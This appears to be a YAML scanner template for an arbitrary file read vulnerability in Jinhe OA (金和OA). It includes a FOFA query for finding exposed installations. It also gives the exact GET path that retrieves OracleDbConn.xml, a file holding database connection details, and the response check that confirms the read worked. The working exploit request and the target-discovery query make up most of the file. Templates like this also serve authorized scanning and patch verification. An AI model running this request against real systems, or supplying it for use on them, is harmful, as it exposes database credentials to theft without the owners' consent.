product: 金和OA
vName: 金和OA 任意文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: 金和OA存在任意文件读取漏洞。攻击者可以读取OracleDbConn.xml文件获取敏感信息。
version: ''
note: ''
search:
  FOFA: app="金和网络-金和OA"
protocol: http
link: https://blog.csdn.net/qq_37113223/article/details/135063762
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - DbType
            logic: and